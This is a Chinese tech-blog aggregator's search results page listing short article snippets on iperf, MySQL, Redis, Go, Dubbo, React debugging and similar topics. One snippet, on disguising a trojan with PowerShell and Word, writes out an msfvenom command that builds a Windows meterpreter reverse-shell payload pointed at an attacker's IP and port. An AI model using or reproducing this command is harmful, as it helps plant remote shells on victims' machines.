码迷,mamicode.com
首页 >  
搜索关键字:client browser    ( 17878个结果
Iperf 网络性能测试工具
iperf是一种命令行工具,用于通过测量服务器可以处理的最大网络吞吐量来诊断网络速度问题。它在遇到网络速度问题时特别有用,通过该工具可以确定哪个服务器无法达到最大吞吐量。 环境: server: centos/redhat 7.4 client:window10 iperf版本: iperf 3.1 ...
分类:其他好文   时间:2021-03-29 11:47:49    阅读次数:0
ubuntu安装mysql
1.执行安装mysql的语句 sudo apt-get install mysql-server mysql-client 2.查看可登陆账户并查看密码 3.获取到了登陆mysql的账户密码登陆 4.之后依次进入mysql数据库,修改root密码,刷新缓存。之后就可以exit退出使用root账户登录 ...
分类:数据库   时间:2021-03-29 11:37:21    阅读次数:0
9、redis.exceptions.AuthenticationError: Client sent AUTH, but no password is set
注册模块连接redis遇到的问题 1、遇到的问题 redis.exceptions.AuthenticationError: Client sent AUTH, but no password is set 2、解决办法 首先打开redis.windows.service.conf(或redis.w ...
分类:其他好文   时间:2021-03-26 15:33:25    阅读次数:0
GO redis
package main import ( "fmt" "github.com/go-redis/redis" ) func main() { client := redis.NewClient(&redis.Options{ Addr: "127.0.0.1:6380", Password: "" ...
分类:其他好文   时间:2021-03-18 14:25:19    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
dubbo 参数理解
client 版本0.1 public class RpcParam implements Serializable { private String name; } 版本0.2 public class RpcParam implements Serializable { private Stri ...
分类:其他好文   时间:2021-03-17 14:55:50    阅读次数:0
response.setHeader("Cache-Control","no-cache");
response.setHeader("Cache-Control","no-cache"); This is used to prevent the browser from caching your dynamic content generated by a JSP or Servlet. Y ...
分类:系统相关   时间:2021-03-17 14:45:16    阅读次数:0
react debug from VS Code —— the Debugger for Chrome extension
原文:https://code.visualstudio.com/docs/nodejs/reactjs-tutorial To debug the client side React code, we'll need to install the Debugger for Chrome exten ...
分类:其他好文   时间:2021-03-16 14:09:27    阅读次数:0
让你的浏览器变成Siri一样的语音助手
最近业余时间浏览技术文章的时候,看到了一篇关于语音朗读的文章:Use JavaScript to Make Your Browser Speak(用Javascript让你的浏览器说话),文章中提到可以通过speechSynthesis实现让现代浏览器语音朗读指定的内容,这激发了我的好奇心去探索了一 ...
分类:其他好文   时间:2021-03-16 14:02:16    阅读次数:0
mysql 设置相关
告诉mysql客户端这边的文字编码 告诉mysql希望返回的结果集编码; set character_set_client=gbk; set character_set_results=gbk; 查看最大上传文件大小 show global variables like 'max_allowed_p ...
分类:数据库   时间:2021-03-16 11:52:41    阅读次数:0
17878条   上一页 1 ... 14 15 16 17 18 ... 1788 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!